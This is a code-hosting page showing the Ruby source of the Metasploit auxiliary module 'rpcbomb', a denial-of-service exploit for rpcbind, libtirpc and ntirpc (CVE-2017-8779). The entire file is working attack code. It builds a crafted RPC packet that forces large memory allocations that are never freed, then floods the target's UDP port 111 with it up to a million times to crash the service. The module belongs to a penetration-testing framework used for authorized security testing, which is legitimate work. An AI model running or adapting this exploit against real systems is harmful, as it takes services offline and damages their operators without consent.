Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/rpc/rpcbomb.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Dos

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::UDPScanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',

16
        'Description' => %q{

17
          This module exploits a vulnerability in certain versions of

18
          rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger

19
          large (and never freed) memory allocations for XDR strings on

20
          the target.

21
        },

22
        'Author' => [

23
          'guidovranken', # original code

24
          'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module

25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2017-8779' ],

29
          [ 'BID', '98325' ],

30
          [ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]

31
        ],

32
        'Disclosure Date' => 'May 03 2017',

33
        'Notes' => {

34
          'Stability' => [CRASH_SERVICE_DOWN],

35
          'SideEffects' => [],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40


41
    register_options([

42
      Opt::RPORT(111),

43
      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),

44
      OptInt.new('COUNT', [false, 'Number of intervals to loop', 1000000])

45
    ])

46
  end

47


48
  def scan_host(ip)

49
    pkt = [

50
      0,        # xid

51
      0,        # message type CALL

52
      2,        # RPC version 2

53
      100000,   # Program

54
      4,        # Program version

55
      9,        # Procedure

56
      0,        # Credentials AUTH_NULL

57
      0,        # Credentials length 0

58
      0,        # Credentials AUTH_NULL

59
      0,        # Credentials length 0

60
      0,        # Program: 0

61
      0,        # Ver

62
      4,        # Proc

63
      4,        # Argument length

64
      datastore['ALLOCSIZE'] # Payload

65
    ].pack('N*')

66


67
    s = udp_socket(ip, datastore['RPORT'])

68
    count = 0

69
    while count < datastore['COUNT']

70
      begin

71
        s.send(pkt, 0)

72
      rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED

73
        vprint_error("Host #{ip} unreachable")

74
        break

75
      end

76
      count += 1

77
    end

78


79
    vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")

80
  end

81
end

82


83